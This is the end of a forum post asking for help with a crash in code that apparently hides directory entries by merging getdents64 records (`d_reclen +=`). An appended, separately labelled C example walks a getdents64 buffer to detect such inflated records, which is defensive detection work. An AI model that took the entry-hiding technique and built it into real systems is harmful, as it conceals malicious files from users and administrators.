I have compared my code to existing open source projects and I could figure out what I’m doing wrong and what could cause the crash. I also added checks for NULL pointers everywhere (although all of them are not in the code now) but none of them really helped.

So I came here to ask for some expert opinion and help, I’m new in this field but I’m trying to learn as fast as I can. Please let me know what causes the above crash and how can I fix it?

Thanks,
Jelal
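
A defender-side view of the `prev_d->d_reclen += d->d_reclen` step in the post, as an added example that is not part of the original post: a user-space walk over a getdents64 buffer that validates every record before reading it and counts records whose `d_reclen` is larger than the name requires. The function names (`count_inflated_records`, `expected_reclen`, `put_record`) are hypothetical, and the 8-byte rounding rule for record sizes is an assumption about how the kernel sizes getdents64 records.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* User-space view of one getdents64 record, same layout as the struct in the post. */
struct linux_dirent64 {
    uint64_t       d_ino;
    int64_t        d_off;
    unsigned short d_reclen;
    unsigned char  d_type;
    char           d_name[];
};
#define HDR offsetof(struct linux_dirent64, d_name)

/* Assumption: a record is header + name + NUL, rounded up to a multiple of 8. */
static size_t expected_reclen(size_t namelen) { return (HDR + namelen + 1 + 7) & ~(size_t)7; }

/* Walk a getdents64 buffer. Returns the number of records larger than their
 * name requires, or -1 if any record is malformed. */
int count_inflated_records(const unsigned char *buf, size_t len)
{
    size_t off = 0;
    int inflated = 0;
    while (off < len) {
        const unsigned char *name, *nul;
        unsigned short reclen;
        if (len - off <= HDR)           /* header must fit before d_reclen is read */
            return -1;
        memcpy(&reclen, buf + off + offsetof(struct linux_dirent64, d_reclen), sizeof reclen);
        if (reclen <= HDR || reclen > len - off)   /* zero, short or overrunning record */
            return -1;
        name = buf + off + HDR;
        nul = memchr(name, 0, reclen - HDR);
        if (nul == NULL)                /* name not terminated inside the record */
            return -1;
        if (reclen > expected_reclen((size_t)(nul - name)))
            inflated++;                 /* slack may hold an entry merged into this one */
        off += reclen;
    }
    return inflated;
}

/* Constructed sample data: write one record at off, return the offset after it. */
size_t put_record(unsigned char *buf, size_t off, const char *name, unsigned short reclen)
{
    memset(buf + off, 0, reclen);
    memcpy(buf + off + offsetof(struct linux_dirent64, d_reclen), &reclen, sizeof reclen);
    memcpy(buf + off + HDR, name, strlen(name) + 1);
    return off + reclen;
}
```

A non-zero count on a raw getdents64 buffer is a lead for further inspection of the slack bytes, not proof of tampering on its own.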
